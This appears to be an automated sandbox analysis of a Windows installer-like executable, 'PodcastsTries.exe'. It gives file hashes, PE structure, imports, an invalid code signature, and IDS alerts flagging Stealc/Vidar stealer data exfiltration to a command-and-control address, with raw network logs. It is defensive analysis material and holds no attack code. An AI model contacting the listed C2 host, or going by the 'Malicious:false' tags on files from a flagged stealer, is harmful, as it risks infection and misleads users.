                                                                                                                                                                                                                                                                                                        SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                        SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):97
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):122218
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                        MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                        SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                        SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                        SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):291
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):130866
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                        MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                        SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                        SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                        SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3473)
                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                        Size (bytes):3478
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.835150817177106
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:uPliuDH6666gFvBbiw4iAnCdG/L3YXC6New29a5fffQfo:ut9DH6666Mkw4iAnCdGDoy6Nmq
                                                                                                                                                                                                                                                                                                        MD5:A95A2247624A55DE75966F38BBC6274B
                                                                                                                                                                                                                                                                                                        SHA1:E2D24147DC72A56ACAB019472B3C3704CE2DFAD8
                                                                                                                                                                                                                                                                                                        SHA-256:6BFB355EA5D1C0160074A5146E9006B2873C8A26AB6A7599650F1C67D2BCC218
                                                                                                                                                                                                                                                                                                        SHA-512:1A8A59AB3EE3FAD2A12B00DD082F021BD093D7F8D820C9ABD83FE003772A9F1CBBDEFCD5925184170441D0BA88DDF0EA4D0F6B5DE20FBBE726F6DAED9A3911DF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:)]}'.["",["college football playoff","james gunn flash","barstool sports baltimore pizza","nintendo switch 2 console","lane kiffin","paris eiffel tower fire","fincen boi reporting injunction","the odyssey film christopher nolan"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                        MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                        SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                        SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                        SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                        Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                        Size (bytes):132738
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.436566301078923
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:fjkJQ7O4N5dTm+syHEt4W3XdQ4Q6/uSr/nUW2i6o:fWQ7HTt/sHdQ4Q6/DfUW8o
                                                                                                                                                                                                                                                                                                        MD5:99E3BDA5CC2977810323C58D84CB8719
                                                                                                                                                                                                                                                                                                        SHA1:BDAE8C8538EDFCC4F98F17BABF9B92927F447509
                                                                                                                                                                                                                                                                                                        SHA-256:BF2E58218B2829F5E42B5AF1B9CA56C44D63EE44B36A74513AC8E624C7630602
                                                                                                                                                                                                                                                                                                        SHA-512:625BB771944898F637B718516AC024F9C42300A657E13FDAECA92964DBA394A1AF4CF9C496F584D681BE114EE3C49390193CECF351E0D1718B78151627524585
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.964933747043997
                                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                        File name:PodcastsTries.exe
                                                                                                                                                                                                                                                                                                        File size:1'259'108 bytes
                                                                                                                                                                                                                                                                                                        MD5:20bef33e4a0add922ae043e2aed13ea2
                                                                                                                                                                                                                                                                                                        SHA1:4d0353be8234f56862b7ea7ece4ded3eeef91cbb
                                                                                                                                                                                                                                                                                                        SHA256:847c28adfa050608203f206d31cce27f1f27e89ab138908473c8c69ccf388ca2
                                                                                                                                                                                                                                                                                                        SHA512:7a387b96497c0026d01820e586e4d0a9686b9927c3270a18170a1e5c138dc8bbee759bed63058fdc865a613956ca7258f7058a6fff78a156f85d6d9a8421c469
                                                                                                                                                                                                                                                                                                        SSDEEP:24576:Fx9yUoL9cVIpol/OQy1HvVrQaygJy/LilXabJUbsVF1M2/y:X9loLhpWIHtUvgyz4KbJYsVzy
                                                                                                                                                                                                                                                                                                        TLSH:65452352432C9467E7EB9AF1B0F09917A13AFD1514BACACF3749B9443D31B910E1AB23
                                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                                                        Icon Hash:fef0f2fed6daca81
                                                                                                                                                                                                                                                                                                        Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                        Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                                                                                                                        Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                                                                                        • 24/06/2022 09:22:08 14/04/2025 16:06:58
                                                                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                                                                        • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
                                                                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                                                                        Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
                                                                                                                                                                                                                                                                                                        Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
                                                                                                                                                                                                                                                                                                        Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
                                                                                                                                                                                                                                                                                                        Serial:115BBE9E1C286827AF66E7A01390C206
                                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                                                                                                                        xor ebp, ebp
                                                                                                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                                                                                                                        call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                        push 00000008h
                                                                                                                                                                                                                                                                                                        mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                        call 00007FC114C77C1Bh
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        push 000002B4h
                                                                                                                                                                                                                                                                                                        mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        push 0040A264h
                                                                                                                                                                                                                                                                                                        call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                        push 0040A24Ch
                                                                                                                                                                                                                                                                                                        push 00476AA0h
                                                                                                                                                                                                                                                                                                        call 00007FC114C778FDh
                                                                                                                                                                                                                                                                                                        call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                                                        call 00007FC114C778EBh
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                        cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                        mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                        mov eax, edi
                                                                                                                                                                                                                                                                                                        jne 00007FC114C751EAh
                                                                                                                                                                                                                                                                                                        push 00000022h
                                                                                                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                                                                                                        mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        call 00007FC114C775C1h
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                        mov esi, eax
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                        jmp 00007FC114C75273h
                                                                                                                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                                                                                                                        cmp ax, bx
                                                                                                                                                                                                                                                                                                        jne 00007FC114C751EAh
                                                                                                                                                                                                                                                                                                        add esi, 02h
                                                                                                                                                                                                                                                                                                        cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                        • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                        • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                        • [LNK] VS2010 SP1 build 40219

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x63376 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x131194 | 0x24d0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x100000 | 0x63376 | 0x63400 | 346d0336f3db87ca7b18657d2c3b5e20 | False | 0.9779424787468514 | data | 7.912454550393707 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x164000 | 0xfd6 | 0x1000 | 9fc48c1dd505e9e157908dde45bfb0ce | False | 0.567138671875 | data | 5.306627890676661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x1002c8 | 0x56b38 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9934924872158771 |
| RT_ICON | 0x156e00 | 0x5ac5 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0006885570426476 |
| RT_ICON | 0x15c8c8 | 0x2676 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0011172049563275 |
| RT_ICON | 0x15ef40 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.6155410903173312 |
| RT_ICON | 0x1615a8 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.7021857923497268 |
| RT_ICON | 0x1626d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.851063829787234 |
| RT_DIALOG | 0x162b38 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x162c38 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x162d54 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x162db4 | 0x5a | data | English | United States | 0.7777777777777778 |
| RT_VERSION | 0x162e10 | 0x290 | MS Windows COFF PA-RISC object file | English | United States | 0.5137195121951219 |
| RT_MANIFEST | 0x1630a0 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |

| DLL | Import |
|---|---|
| KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
| USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
| GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
| SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
| ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
| VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-24T19:27:44.693699+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.6 | 49806 | 188.245.216.205 | 443 | TCP |
| 2024-12-24T19:27:47.008486+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.6 | 49812 | 188.245.216.205 | 443 | TCP |
| 2024-12-24T19:27:49.377028+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 188.245.216.205 | 443 | 192.168.2.6 | 49818 | TCP |
| 2024-12-24T19:27:51.679968+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 188.245.216.205 | 443 | 192.168.2.6 | 49824 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:50.314249992 CET4434971320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:50.739707947 CET4434971320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:50.786564112 CET49713443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:51.317965984 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:51.318003893 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:51.599131107 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:58.488861084 CET49715443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:58.488926888 CET4434971520.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:58.489046097 CET49715443192.168.2.620.198.119.84
